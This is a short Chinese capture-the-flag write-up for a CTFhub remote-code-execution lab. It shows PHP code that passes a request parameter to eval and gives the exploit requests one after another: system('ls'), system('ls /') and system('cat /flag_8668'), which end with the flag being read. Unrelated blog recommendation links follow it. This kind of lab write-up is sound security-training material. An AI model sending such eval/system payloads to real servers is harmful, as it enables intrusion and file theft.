CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
moshuying8 小时前
别让AI焦虑,偷走你本该有的底气
前端·人工智能
GIS之路9 小时前
ArcPy,一个基于 Python 的 GIS 开发库简介
前端
可夫小子10 小时前
OpenClaw基础-为什么会有两个端口
前端
喝拿铁写前端10 小时前
Dify 构建 FE 工作流:前端团队可复用 AI 工作流实战
前端·人工智能
喝咖啡的女孩11 小时前
React 合成事件系统
前端
从文处安11 小时前
「九九八十一难」组合式函数到底有什么用?
前端·vue.js
用户59625857360611 小时前
戴上AI眼镜逛花市——感受不一样的体验
前端
yuki_uix11 小时前
Props、Context、EventBus、状态管理:组件通信方案选择指南
前端·javascript·react.js
老板我改不动了11 小时前
前端面试复习指南【代码演示多多版】之——HTML
前端
panshihao11 小时前
Mac 环境下通过 SSH 操作服务器,完成前端静态资源备份与更新(全程实操无坑)
前端
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南06Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤07AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot08Window 10部署openclaw报错node.exe : npm error code 12809让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10网站改了域名,如何查找?